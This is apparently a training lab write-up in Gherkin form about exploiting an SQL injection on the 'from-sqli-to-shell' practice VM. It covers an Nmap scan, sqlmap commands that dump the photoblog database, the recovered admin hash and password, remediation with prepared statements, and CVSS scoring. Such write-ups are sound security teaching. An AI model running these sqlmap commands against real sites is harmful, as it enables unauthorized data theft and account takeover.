## Version 1.4.1
## language: en

Feature:
  TOE:
    from-sqli-to-shell
  Location:
    http://192.168.17.134/cat.php?id=1
  CWE:
    CWE-89: Improper Neutralization of Special Elements used in an
      SQL Command ('SQL Injection')
  Rule:
    REQ.173: https://fluidattacks.com/products/rules/list/173/
  Goal:
    Login as admin
  Recommendation:
    Must be careful with put params directly in the query

  Background:
  Hacker's software:
    | <Software name> | <Version>   |
    | Kali            | 2021.1      |
    | Firefox         | 78.9.0esr   |
    | Nmap            | 7.91        |
    | Sqlmap          | 1.5.3       |
    | VMware          | 16.1.0      |
  TOE information:
    Given I have the machine Lab running on VMware [evidence](01.png)
    And It is in my network
    Then I decide to scan my network to find which ip was assigned to it
    And I use the next Nmap command to do it
    """
    nmap 192.168.17.0/24
    """
    And I got the result
    """
    Nmap scan report for 192.168.17.134
    Host is up (0.0029s latency).
    Not shown: 998 closed ports
    PORT   STATE SERVICE
    22/tcp open  ssh
    80/tcp open  http
    """
    Then I know its ip is 192.168.17.134
    And It has ports 22 (ssh) and 80 (http) opened

  Scenario: Normal use case
    Given Http is working on port 80
    Then I access to http://192.168.17.134
    And I see the webpage [evidence](02.png)

  Scenario: Dynamic detection
    Given I can't access the source code
    Then I start to check each tab in the webpage
    And I find there is a login form in the admin tab [evidence](03.png)
    Then I try to login using common words
    But It doesn't work
    Then I keep searching the tabs
    And I notice that "test", "ruxcon" and "2010" tabs have the same url
    And an id parameter that change for each one
    Then I try to put a rare value for the id like "*"
    And I get an error [evidence](04.png)
    Then I notice it's a mysql error
    And It indicates a possible sql injection vulnerability

  Scenario: Exploitation
    Given the possible sql injection
    And It's working with php
    Then I try to list databases using Sqlmap
    """
    sqlmap -u "http://192.168.17.134/cat.php?id=1" --dbs --batch
    """
    And I get in the output
    """
    [11:07:09] [INFO] fetching database names
    available databases [2]:
    [*] information_schema
    [*] photoblog
    """
    Given the webpage has in his title "photoblog" word
    Then I decide to use photoblog database
    And I try to retrieve database data with
    """
    sqlmap -u "http://192.168.17.134/cat.php?id=1" -D photoblog
     --dump-all --batch
    """
    And I get tables data
    And I notice admin credentials are in "users" table
    """
    Database: photoblog
    Table: users
    [1 entry]
    +----+-------+---------------------------------------------+
    | id | login | password                                    |
    +----+-------+---------------------------------------------+
    | 1  | admin | 8efe310f9ab3efeae8d410a8e0166eb2 (P4ssw0rd) |
    +----+-------+---------------------------------------------+
    """
    Then I try to use them in the login page
    And I login as admin user [evidence](05.png)

  Scenario: Remediation
    Given I don't have access to the source code
    Then I assume id parameter is being addes directly to the query
    And It is generating de vulnerability
    Then It can be solved using PHP MySQL Prepared Statements
    And It will prevent the id parameter values of being read as commands

  Scenario: Scoring
  Severity scoring according to CVSSv3 standard
  Base: Attributes that are constants over time and organizations
    7.3/10 (High) - AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:L/
  Temporal: Attributes that measure the exploit's popularity and fixability
    6.8/10 (Medium) - E:F/RL:O/RC:C/
  Environmental: Unique and relevant attributes to a specific user environment
    7.8/10 (High) - CR:H/IR:M/AR:M

  Scenario: Correlations
    No correlations have been found to this date 2021-03-31
